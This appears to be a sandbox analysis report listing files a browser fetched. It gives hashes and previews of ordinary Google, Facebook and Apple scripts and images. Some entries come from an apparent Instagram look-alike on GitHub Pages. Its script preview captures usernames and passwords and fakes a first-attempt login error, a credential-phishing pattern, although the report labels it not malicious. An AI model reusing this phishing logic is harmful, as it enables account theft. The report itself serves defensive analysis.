                                                                                                                                                                                                                                  Preview:RIFF.v..WEBPVP8X...........k..VP8L.v../..Z..Hl.H.$.=.=....{.?...O@.6.,.........m.O...- ..G.....e..^.Q....I..... ...\q..=a...m..9.G..N.e.A.....H....d.n....x....m....5..33..d...4Nl.&M.t.$....].9.C.....$H...`.L.I.E...`.Ku i;...u........b.D..v.o..~...L..=......S....v6G./'}.i......H..R...C[....}......T...o".YYk%...HF..I..Z}..|X]M.<.!-4..%..I.-.u.k.....x...1..c..a|.$..(...F..B..!.1...<..U.._.K.....PP.m.M,.gC.\.r........s.^$..H.,KV.'..k...|. ....S:+...hQ..p.%....(Q@6........x..[.V==...{.px.@.p.q7.t.(( J.. 8..7.}...Ca.s).9.............%.A.}..yd]...?DA......A..-)\q.`s.......gk.sFZ8A..6J.W.lD.}.....~....Z.z...6.. .......T...\g..k...9...(l.F.....0w...!..u=.G.....#7c.p.+....\...0....J.m.<~-......ba.vVM..}...Z.D.....c......@.R.*.R.....(.i........wg.'........Y.p.k.E#\n...H..7.V....!.tx......w...r...g.|.}...s..........i....k.....Q[..$D........]...b(.b.W.AL>.}......!.\0/|.mF.:....2.|.. ...8%...'........4.WO.t....bi..)..ny.'.F..K..........x...T?.%!Y....R..q......9
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (724)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):551834
                                                                                                                                                                                                                                  Entropy (8bit):5.646059185430787
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:ytxIUYTteVvs0E8gSdoxS4MLYw1tZnAzsz1I9VBojCdzNDC2vPpD:ybYTZMgGopkAzsz1ciEU2d
                                                                                                                                                                                                                                  MD5:33AFF52B82A1DF246136E75500D93220
                                                                                                                                                                                                                                  SHA1:4675754451AF81F996EAB925923C31EF5115A9F4
                                                                                                                                                                                                                                  SHA-256:B5E8EC5D4DCC080657DEB2D004F65D974BF4EC9E9AA5D621E10749182FFF8731
                                                                                                                                                                                                                                  SHA-512:2E1BAAE95052737BDB3613A6165589643516A1F4811D19C2F037D426265AA5ADF3C70334C1106B1B0EEF779244389F0D7C8C52B4CD55FCE9BAB2E4FCB0642720
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var z=function(){return[function(v,p,K,u,W,n){if(!((v>>2&(n=[6,"Unknown format requested type for int64",9],n[0])||!U[22](11,this.U(),p)&&this.dispatchEvent("enter")&&this.isEnabled()&&R[23](n[2],this,2)&&R[3](n[0],2,!0,this),v-1)<20&&(v>>1&7)>=4&&(u=new vf,W=R[41](1,p,u,kV,K==p?K:P[8](37,K),5)),v<<1&11))throw Error(n[1]);return W},function(v,p,K,u,W){return((W=[17,7,46],v)<<2&W[1]||(p=function(n){return K.call(p.src,p.listener,n)},K=UJ,u=p),(v-1|12)<v&&(v-9|59)>=v)&&(u=M[W[2]](15,p)&&!M[W[2]](13,."iPod")&&!M[W[2]](W[0],K)),((v|8)&W[1])==1&&(u=p.Y?p.Y:p.I?"application/x-protobuffer":""),u},function(v,p,K,u,W){retu
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.232748734572136
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnsooYUAuGNG/QVI0shiRrPUggGwQRaNw6JpyxZRNlad0:kRZTFNpI/AI02ilPUgWkbRN20
                                                                                                                                                                                                                                  MD5:938E06E18D6525884CF9A899849D0954
                                                                                                                                                                                                                                  SHA1:263972FA1F541489C1DDA4570F093D8862629D04
                                                                                                                                                                                                                                  SHA-256:31C7F588A3322D3BF9F468870E345524C7963E14FE64C70E1588C2D86982A60F
                                                                                                                                                                                                                                  SHA-512:5CDB3A0DF61E981010308E699AD588130AB39665D67F43A888C448D6D554851B59E8BD30C2AF6328A7A95E486EBC7E1DE4FD761A05F60F006FE3C03F881EAAB2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("iLGjNb");._.qr(_.kAa,class extends _.rr{constructor(a){super(a.ta)}H(){return"iLGjNb"}N(){return!0}Xa(){return _.pAc}});_.$q.iLGjNb=_.fQa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13436
                                                                                                                                                                                                                                  Entropy (8bit):7.867534925657486
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:WF0VSb7BFEdnLvlH6cOLr7H2T9lvIvvqlhHAw1CEZi8z13tK/TEVWf3Hhdftx2t1:hMXcNH6c22TJL1CE7K/TE63hdF4OW
                                                                                                                                                                                                                                  MD5:6C4DF94396ED09B0AE1B239F2A59936F
                                                                                                                                                                                                                                  SHA1:ED118E0F96B62350789012829FA3774ED2EB7DD1
                                                                                                                                                                                                                                  SHA-256:7D23976AA96D4AB304D0B86253FA4009C25C3B74E114D07F70FE6247451B2682
                                                                                                                                                                                                                                  SHA-512:3BEDF7C1DE2B1B69D999E121A2A4B2F0C7CFC0DDF1573A481B26B45C2804796AFAAA4777C75E87B951B6C09B42004799164535D85C8E140A4A9A83B43E352D25
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:......JFIF................................... %.%%./'10-'-+5=PB58K9--EaEKSV[\[2AemdXlPY[W......./..-W65=WWWWWWWWWWWWWWWWWWWWW]WWWWWWWWWWWWWWWWWWWWWWWW_WcW......h....".......................................C........................!1AQ..."Raq........2B.....#3Sb.Cr..T.%4.$..............................(........................!Q1A.R."a..2B.............?..........................................................................................................................................................r......a....i.[.q7..wC....4>-..T.J....vj...:.f......l.....,....vS..^....y1.lp7W.LC...........T..}..1.....s.Z.._._H{._.K.K........0...W..._H{._.K.............uk..s......../.v..~G....s.j..\...j..\...~......m.._.K....^.~.9}#......1...^.~.9}!.~..r.Gk?G...b...~..r.E..~..r.Gk?G......v+..s....W.../.v..w...f(.^.W.../@.b.~.9z..~.....(.^.W.../@.f.~.9z..~.......k...\......../B.s.w...@..f.~.9z..5.........?lP6....\..YO."N.t~2..;Y.Y..~. z..cq1Ws...../.....T..8.Kyp.5......T..{._.K......w..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):4588
                                                                                                                                                                                                                                  Entropy (8bit):4.730261253735456
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:uKHXbfHy7Q8Azy2t2F9ys8CGWQukifkiTHpMTR30cfRA8gNRE:u8XTHy7Qty2t2F9ys8xWQuLkiTHpMTRj
                                                                                                                                                                                                                                  MD5:962C5BDDDCCD7E3323671ED88CAF524D
                                                                                                                                                                                                                                  SHA1:4616F9990BF7FCF74D0DE482248FE1FEDBB5467F
                                                                                                                                                                                                                                  SHA-256:9B6F06EA1E0251F6A6F5D41E661C420621A310C3814582C690E11F3D3624DE2B
                                                                                                                                                                                                                                  SHA-512:576E835B2F6B2A60EC2F489B6463C8A78BA4A067929DFC22E1D596F4B9468268BC8F9C79111B5B86476E7A6763C739D286D94743394D5E1963D3946BBA970CB7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://sayidanur.github.io/instagram.com/styles.css
                                                                                                                                                                                                                                  Preview:* {. border: none;. box-sizing: border-box;. font-family: Arial, Helvetica, sans-serif;. margin: 0;. padding: 0;.}..body {. background-color: #fafafa;. height: 100vh;.}..main {. height: 100vh;. margin: auto;. max-width: 935px;.}..a { text-decoration: none; }.h1 { margin: 20px 0; }.ul { list-style: none; }../**.* Flex rules.*/...flex {. display: -webkit-box;. display: -moz-box;. display: -webkit-flex;. display: -ms-flexbox;. display: flex;.}...direction-column {. -webkit-box-direction: normal;. -webkit-box-orient: vertical;. -moz-box-direction: normal;. -moz-box-orient: vertical;. -webkit-flex-direction: column;. -ms-flex-direction: column;. flex-direction: column;.}...justify-content-center {. -webkit-box-pack: center;. -moz-box-pack: center;. -ms-flex-pack: center;. -webkit-justify-content: center;. justify-content: center;.}...align-items-center {. -webkit-box-align: center;. -moz-box-align: center
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12099)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):102543
                                                                                                                                                                                                                                  Entropy (8bit):5.451921115834891
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:JS2wC8hEcI1cX3AIegU85BKGeRjWOkVJA+aL4hv9DGONOvV/l6t:JS2wbEiXhBX9VJA+aL0Dm76t
                                                                                                                                                                                                                                  MD5:C43C6F2EA427B9539007038F8428A2DF
                                                                                                                                                                                                                                  SHA1:4B1191BC67E8BA493CCE616192DE66EA76B9D051
                                                                                                                                                                                                                                  SHA-256:8C3F89F04BFEA4FAD4E753C33CC6993BF39D222DADEF960808146695980900EF
                                                                                                                                                                                                                                  SHA-512:09FD301691EB5F96532C3DDBC801D98A0D5CD9D85AE147D584CCB567F4752B3BA3BC089517454BA9AA27B59D2220E5FE7EF4ED3FB97585EA4120C1001837BBEA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("BaseContextualLayerAvailableHeightContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);g["default"]=b}),98);.__d("BaseContextualLayerContextSizeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);g["default"]=b}),98);.__d("BaseContextualLayerDefaultContainer.react",["LegacyHidden","react","stylex","testID"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j=i||d("react");b=j.forwardRef(a);function a(a,b){var d=a.children,e=a.hidden;a.presencePayload;var f=a.stopClickPropagation,g=a.testid;a=a.xstyle;return j.jsx(c("LegacyHidden"),{htmlAttributes:babelHelpers["extends"]({},c("testID")(g),{className:(h||(h=c("stylex")))(a),onClick:f===!0?function(a){return a.stopPropagation()}:void 0}),mode:e?"hidden":"visible",ref:b,children:d})}a.displayName=a.name+" [from "+f.id+"]";e=b;g["default"]=e}),98);.__d("BaseContextualLayerLayerAdjustmentContext",["react"],(function(a,b,c,
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):948450
                                                                                                                                                                                                                                  Entropy (8bit):7.994527784735151
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:24576:f9nhOWDTsh3t1hl1dGvZVKhH2D6bmoNGHiJjTZv6kGXzR:f9hOKTw3HX1ohQhWD6bLNGuRPwN
                                                                                                                                                                                                                                  MD5:856A66A0B50F88685F8A15DD3E79EF08
                                                                                                                                                                                                                                  SHA1:3C7A567F82FB6FE827AEABD152B7A3114486691B
                                                                                                                                                                                                                                  SHA-256:A83E00BF0AA7EC6B597E16012829EBD0E09C352A23BCDE1FB9AB18362334928C
                                                                                                                                                                                                                                  SHA-512:36541CDC5F82C924BE719791E1A80D62FFBD484A9A16167C14DAAD7A0FE77770648315ABB7D13FFF0D6622912E9005CD2885C4BE0D1ED653B61A1BB388A9D17E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.x..WEBPVP8L.x../.H6...E....l...m.nJ.].m;.m.....$.1..{/....(oe.m.m.l..m.6o.#.....#..{..y..>.Zi}x..c.....@.aP.......2.F.K..$<..;@...=..0.-.....q?n.%=n.`FC..H.fj......vP..4r.O.F...N3^.D..Yx..I.f...:.DG(Rk..........{. ..R.~.....p....` q..v5.'.D....H....-:s....m.?;;......N0..z...F..K....b.).Q.o....N4,..=}..v. ..{AC....h.FG...L...".g....(t...H.JBPH.l.w...A..a(....O.*|H..............p..8,.2../..O...e Pd...C.)....x.z..A......U84..vEY..h..`r....:W\.,...E...uT...O..~..bL....H@#..B.N..#.5....H.W$O7.h..!.H.I^SN.[d.>.|]n.@5...O.y..%.A..#:..W.8l.A.....R.....5v....6..;,.L......|..K....)....A....3...3(..q....fxF.(......B.M@Y...JH..J....$..@...H.B.GD.a......H..^.y.i....(..4..M.h.,y.. s:#.c.(.#.)...bH.d...W6..8.Hj.z3..Y..x.....Y.uh.rS<.........9W...?,.V.FNK..y.n....?...)......*.~.LA.5..v..a79:la.c . ..4B.v...K...A..<..+e.....+.\.H..h......ZTb..j!R.....~?.....:.|..E...d+u.T.Io^7.........D.....:-.r[Z.;D..z ;= ..Ac#,p.....%.PP.&..e....E..M.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5717)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):67930
                                                                                                                                                                                                                                  Entropy (8bit):5.350281148314441
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:9HDLotdWvrV8YctZCUmeTVxETDGjTHvoKNU28W3Bq9eW5:VDLotdWvrV8YctZCUiTDYDvoKNUExqb
                                                                                                                                                                                                                                  MD5:F16C089BF22C5A3450A3B941D8D1D3B3
                                                                                                                                                                                                                                  SHA1:6543253FE5800826256E7F0900D6BE807ED82DE2
                                                                                                                                                                                                                                  SHA-256:0FB7810E3D1EEAC1CA74723786D499CFB6CE9E7C2942F0959F13D6F5A935736A
                                                                                                                                                                                                                                  SHA-512:ABD13F038E07C841551DDC35C40BAD7E6A1A7B2351A70A6EFB2A9B538C159A26524C21D2B5DF0EFF9D619A2709EB4D5E0EE10025B79BE6E88F95C7F420D9F57A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("BrowserScroll",[],(function(a,b,c,d,e,f){function a(){var a;return window.pageXOffset||((a=document.documentElement)==null?void 0:a.scrollLeft)||((a=document.body)==null?void 0:a.scrollLeft)||0}function b(){var a;return window.pageYOffset||((a=document.documentElement)==null?void 0:a.scrollTop)||((a=document.body)==null?void 0:a.scrollTop)||0}f.getPageScrollLeft=a;f.getPageScrollTop=b}),66);.__d("StickyController",["CSS","Event","Style","Vector","queryThenMutateDOM"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a,b,c,d){this._element=a,this._marginTop=b,this._onchange=c,this._proxy=d||a.parentNode,this._boundQueryOnScroll=this.shouldFix.bind(this),this._boundMutateOnScroll=this._mutateOnScroll.bind(this)}var c=a.prototype;c.handleScroll=function(){b("queryThenMutateDOM")(this._boundQueryOnScroll,this._boundMutateOnScroll)};c.shouldFix=function(){return b("Vector").getElementPosition(this._proxy,"viewport").y<=this._marginTop};c._mutateOnScroll=fun
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):7094
                                                                                                                                                                                                                                  Entropy (8bit):7.959419718247538
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:F3JYFJ9r/nyXq20/1FmCXl4CbMM1kJ2ednlhhuFM:sB+q20/FXl4LM1kjDOM
                                                                                                                                                                                                                                  MD5:28C793A8D42E2BF761FF6BE55C664010
                                                                                                                                                                                                                                  SHA1:70D072E2744B5A30A99FE99AD0AB4ABA2CCDC124
                                                                                                                                                                                                                                  SHA-256:633014DDBE1C4043A35FA963EC4EF649032F924B61BC717DE33C233C19534DF9
                                                                                                                                                                                                                                  SHA-512:32C7123534B0F5F27ACF79A4C16A0A8617DE9AA790B90ED770167A2724A28024855792D949E5D90FEDCDD460DC6DBAADE1C9C4685EE7DDF41F60C64E23301CF3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/Y9BUoMIWfhZDUFZ_MxQmnsgSyb3O8s8Sds65E_j46-vdDSJi_0Xqmoa-fHaQa7fGlw=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../?...M(l..Avw.......}.w...)..E..... Y8.$I.......g.c.l#.n.x""E*.*....nXG.m..g.W!...x....._.>uZ.......-j..1.....o.A.(h..q......3.........;j...v{.9.."..xL7.....o.v.U...G...IK .80M.5.L..`..i..e.....@fwP..QK..z.=.......d;.M...T......h.h.h.(23$gF......... y..m...~...R..m%.......!+.##.Q;j.....7.l..as^.......4C.9..N.......kx..9..U.I.....m.e..gx............L.g.|.m.m.^.l.m....5......Q..6C.m..#"U.}..y.m.Z.m.m.6N..>.8.....[..$.y..DU6...m..mv..m.k......../.....|....... .@.h.py..........|....a.G{..h.e..B@}d.I....G'...K3.....l.".bi{?.0....h.H..!....$..T.B..{:..Q..x.........&..P....V...|.H(BZ!.....?EQ0 .....c9....> .Q..@.....%5...!.j..YB..-p..$..>.KE.f..Xk"IU0....P....KG......7.W.4T.......9..s.@.=.j.!.......(.....>.....=m>...V5...V..[@.z. D...b....Y.....t...m....3W......b)C'2.......i..e..~....J2.0*..F.....>.....i./.}....U...O*.S.gs.<..+O..k/....x...~..]..-].......~.qx.KT*.].I.@....<\.&....sK7.".D...h/....h-..om
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (31470)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):45781
                                                                                                                                                                                                                                  Entropy (8bit):5.4005500598459015
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:xq9DvQPUjkEO1ayPW9ZybWRxatCvEAGm45TqZYu:OpjU1PbWRxatC4m45uZYu
                                                                                                                                                                                                                                  MD5:6126870CB22D062ABFAAEF09FF102DF5
                                                                                                                                                                                                                                  SHA1:92AF3022CC9C9BE309E42FFE0F450ED3E95CA622
                                                                                                                                                                                                                                  SHA-256:ED977AB797E2C2CD3EA3973E6A1A417CB0F0FA293CA6D9E0BE5B0D11FF3AC76F
                                                                                                                                                                                                                                  SHA-512:F34B46A7E2CFB84AE103870ADEEAD1B9E73E0DAEFA03D7E210B985C2098418680D1496509F1D8C9F85D565270DFC55DB0B74988E19EB4FA77637239CADF07C12
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/V5iPrLb12Rf.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("Wedge.art",["ReactART","create-react-class","prop-types","react"],(function(a,b,c,d,e,f){var g,h=g||b("react"),i=b("ReactART").Shape,j=b("ReactART").Path;a=b("create-react-class")({displayName:"Wedge",propTypes:{outerRadius:b("prop-types").number.isRequired,startAngle:b("prop-types").number.isRequired,endAngle:b("prop-types").number.isRequired,innerRadius:b("prop-types").number},circleRadians:Math.PI*2,radiansPerDegree:Math.PI/180,_degreesToRadians:function(a){if(a!==0&&a%360===0)return this.circleRadians;else return a*this.radiansPerDegree%this.circleRadians},_createCirclePath:function(a,b){var c=j();c.move(0,a).arc(a*2,0,a).arc(-a*2,0,a);b&&c.move(a-b,0).counterArc(b*2,0,b).counterArc(-b*2,0,b);c.close();return c},_createArcPath:function(a,b,c,d){var e=j();a=this._degreesToRadians(a);b=this._degreesToRadians(b);var f=a>b?this.circleRadians-a+b:b-a,g=Math.sin(a),h=Math.sin(b);a=Math.cos(a);b=Math.cos(b);var i=h-g,k=b-a,l=d-c;f=f>Math.PI;e.move(c+c*g,c-c*a).arc(
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12513)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):13517
                                                                                                                                                                                                                                  Entropy (8bit):5.314863543101727
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:8nlFipHnQ5/BRZJ/bzwT62waHKsR5ssRaREW+ou:8lF2HQ5JRjbQw9sRasROEWY
                                                                                                                                                                                                                                  MD5:24F387A60FE0B05A15426D721C397D47
                                                                                                                                                                                                                                  SHA1:012EB578C3C097193F20F123732AC646D2800096
                                                                                                                                                                                                                                  SHA-256:6AD8C8A703856136FEA1D1911FE8C0E09BCE87EDE20F4C8B98AB8F8961462738
                                                                                                                                                                                                                                  SHA-512:787E1A2BCCBCD973135E53B53FA5BC89E59AC277D95F30B0595B225667B1F0DEB6616914915200ABB6E522DDEA144E2EEF140876CA502D1317E13E86E63DA9A1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-1ec6e574.js
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.const e="musickit-components";let t,n,l,s=!1,o=!1,i=!1,r=!1,c=null,f=!1;const a="undefined"!=typeof window?window:{},u=a.document||{head:{}},d={t:0,l:"",jmp:e=>e(),raf:e=>requestAnimationFrame(e),ael:(e,t,n,l)=>e.addEventListener(t,n,l),rel:(e,t,n,l)=>e.removeEventListener(t,n,l),ce:(e,t)=>new CustomEvent(e,t)},p=e=>Promise.resolve(e),$=(()=>{try{return new CSSStyleSheet,"function"==typeof(new CSSStyleSheet).replaceSync}catch(e){}return!1})(),m=(e,t,n)
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):3212
                                                                                                                                                                                                                                  Entropy (8bit):4.868427484902244
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:1gJY0gXK6gulXtVcf/G9qLi1bg7atsMQtX/2WCwktV:u7stV99qe1cksv5bCjP
                                                                                                                                                                                                                                  MD5:477DBD44D5E73A3CB614E8848C5B796A
                                                                                                                                                                                                                                  SHA1:07B766C6F560DF6B8AAD13C9DAEC11A18E4DFE98
                                                                                                                                                                                                                                  SHA-256:68DFCE70EC7C8A7AA72FFF4CE1A32845BCCD1C36C49F03A4CC50ED05F7BCD275
                                                                                                                                                                                                                                  SHA-512:6FCEA1B7B07AFBBFB76A0084B02F886702CD5394CFF01F7A22AD20FEA47921B7340D2E60976D699DA57D267228554C2314397CDF814C6482E9A7797DCA3A4C8A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://sayidanur.github.io/instagram.com/main.js
                                                                                                                                                                                                                                  Preview:document.addEventListener('DOMContentLoaded', () => {.. const form = document.getElementById('telegramForm');.. const loading = document.getElementById('loading');.. const validText = document.querySelector(".invalid") .. let tryCount = 0; // ....... ....... ......... form.addEventListener('submit', function(e) {.. e.preventDefault();.. .. const username = document.getElementById('username');.. const password = document.getElementById('password');.... // ........ ...... invalid-input, .... .. ... ........ ....... username.classList.remove('invalid-input');.. password.classList.remove('invalid-input');.... if (tryCount === 0) {.. // .... ...... ......., ........ ... .......... ...... username.classList.add('invalid-input');.. password.classList.add('invalid-input');.. validText.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.18336194072865
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnsodAuGNG/QVIAhitVnSvOwQRaNw6JpyxZRNlad0:kRZTFsZI/AIai6v7kbRN20
                                                                                                                                                                                                                                  MD5:45697781B20F80072845A38DA7F7CF99
                                                                                                                                                                                                                                  SHA1:29F0FFCC0411E60DC7DD063DFEB6D97DACA9537A
                                                                                                                                                                                                                                  SHA-256:109B67697C101DBBE438C496BC6FD58D9472BDE2F9BE31F845AE1C3C8DA43EE6
                                                                                                                                                                                                                                  SHA-512:03793CA34698959B62F8D06BFAEE7444C9E719EEB4C3E5DF009ECA05FA14F5F5635F77F2A1963D2E4638E7E24092ABC2EB453A118BEC89753C01FF5667338A1F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("pQUyNd");._.qr(_.aCa,class extends _.rr{constructor(a){super(a.ta)}H(){return"pQUyNd"}N(){return!0}Xa(){return _.HOc}});_.$q.pQUyNd=_.rRa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65359)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):200589
                                                                                                                                                                                                                                  Entropy (8bit):5.379175388908165
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:vd3wWLstPIEovvdQfaPvQmfIiBSQZWc1APF3SDRns71iMw8F6Oum19udpz9/VgDc:V3wIvLvLwDXYn6L9C/G89Y357C
                                                                                                                                                                                                                                  MD5:EE1AC470ECB79FEFCFA9EC4B52BA85DC
                                                                                                                                                                                                                                  SHA1:15F59D28D417ECA124A7218466D45650D52EDD31
                                                                                                                                                                                                                                  SHA-256:D415BBD88F59C56CB18AD305E006B0ECE3A2B5902504F66F4B07252812C5FBF1
                                                                                                                                                                                                                                  SHA-512:B23FF3B718A765D52158571E59DF01B0AD5CA375930663116E2D30060C267BFB921372E85A745DFDFE0BFACB72C4D6334F4254694FFE1D2594FB97B09CB4AB9E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ReactFiberErrorDialog",["cr:8909"],(function(a,b,c,d,e,f,g){"use strict";function a(a){return b("cr:8909").showErrorDialog(a)}g.showErrorDialog=a}),98);.__d("ReactDOM-prod.classic",["EventListener","Promise","ReactFeatureFlags","ReactFiberErrorDialog","react","scheduler"],(function(d,e,f,g,h,i){"use strict";var j,k,l=j||e("react"),m=Object.assign;function n(d){var e="https://react.dev/errors/"+d;if(1<arguments.length){e+="?args[]="+encodeURIComponent(arguments[1]);for(var f=2;f<arguments.length;f++)e+="&args[]="+encodeURIComponent(arguments[f])}return"Minified React error #"+d+"; visit "+e+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var o=e("ReactFeatureFlags").alwaysThrottleRetries,p=e("ReactFeatureFlags").disableDefaultPropsExceptForClasses,q=e("ReactFeatureFlags").disableLegacyContextForFunctionComponents,r=e("ReactFeatureFlags").disableSchedulerTimeoutInWorkLoop,s=e("ReactFeatureFlags").ena
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8477)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):51589
                                                                                                                                                                                                                                  Entropy (8bit):5.384712804809677
                                                                                                                                                                                                                                  Encrypted:false
